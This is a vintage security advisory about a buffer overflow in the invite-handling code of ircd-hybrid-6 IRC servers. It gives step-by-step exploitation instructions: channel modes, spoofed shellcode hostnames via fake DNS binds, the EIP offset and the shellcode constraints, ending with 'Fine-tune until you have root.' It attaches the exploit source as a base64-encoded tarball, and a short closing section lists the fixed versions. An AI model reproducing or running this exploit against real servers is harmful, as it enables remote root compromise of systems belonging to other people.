COMMAND
ircd
SYSTEMS AFFECTED
Some IRC servers
PROBLEM
This vulnerability was discovered by jduck and stranjer of w00w00.
After discussing the vulnerability, it was reported to Dianora by
jduck and fixed. Hopefully the vulnerable irc servers have been
fixed. If not, it's unfortunate Dianora didn't notify the
vulnerable irc servers or they didn't take these 2 months to fix
themselves. The vulnerability is in the invite handling code
(m_invite). In a channels with operators (ops) and modes +pi
(paranoid + invite-only), a channel invitation is reported to all
other operators. The buffer used to store the invitation notice
can overflow its boundaries by up to 15 bytes. Steps:
1. Client 1 (9chars!10chars@trivial) joins #199chars
2. Client 2 (trivial!trivial@trivial) joins #199chars
3. Client 1 sets mode #199chars +pio Client 2
4. Client 1 invites Client 3 (9chars!10chars@63chars) to #199chars
Note: client 1 and client 3 should _not_ be from the same host.
With exploit, client 3 (compile/run hostname.c) first, then
compile/run ircdexp.c.
Client #1's server = vulnerable irc server (such as irc.arpa.com)
Client #2's server = trivial
Client #3's server = ComStud irc server (such as irc.prison.net),
because it allows shellcode chars in hostname
Using the following spoofed host (59 chars):
shellcodeshellcodeshellcodeshellcodeshellcodeshellcode.AAAA
[The ComStud ircd will check for a '.']
Here, EIP = 0x41414141 (AAAA). The other registers are negligable.
The hostlen is actually 63 bytes, but for this specific overflow,
EIP is overwritten at buf[54-58]. We have to take stdout/stdin
descriptors into consideration. We are very limited in size
(only have 54 bytes for shellcode), so we can't fit bind
shellcode. Instead, we took the standard Linux x86 shellcode,
dropped exit handling code, added a close'd stdin, dup'd cptr->fd
(cptr is the first argument passed to m_invite). Since we only
have 54 bytes to work with, we can't fit code in to close stdout
and dup cptr->fd, so output will be sent to whatever terminald
ircd was started from. If you do not wish for the output to be
seen, redirect everything (via '>') /dev/null.
As for how to go about spoofing, you have options:
1) Use the old DNS poison caching method
2) Use custom "fake binds" that will just pass on your
shellcode as a hostname in response to a DNS query (idea
from nyt).
Option #2 is the approach we will take (hostname.c generates the
shellcode we'll use). This will work fine as long as you
IP/hostname hasn't already been cached. Because these "fake
binds" are pretty popular (or have been in the past), they should
be easy to come by and are outside the scope of this advisory. So
full steps are, client with the spoofed hostname, connect to a
ComStud ircd server (such as irc.prison.net), another client join
the arbitrary client, and another client join the target ircd
hybrid-6 server (such as irc.arpa.com). Once the channel is +pi
(and your channel, ident, username, etc. all the right length),
invite the client with the spoofed hostname. Fine-tune until you
have root. Mimed exploit code follows.
---
Content-Type: application/octet-stream; name="ircdexp.tgz"
Content-Transfer-Encoding: base64
Content-Disposition: inline; filename="ircdexp.tgz"
Content-MD5: 5uDUOD+l1hrrRL0PPOTPDA==
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
-----
SOLUTION
The buffer mentioned above was introduced in ircd-hybrid-6b17 and
fixed in ircd-hybrid-6b75. All EFnet servers have upgraded or
patched. Hybrid-6 is still in semi-private beta and has not been
released publicly. The current release version of Hybrid is
ircd-hybrid-5.3p7, which is not vulnerable.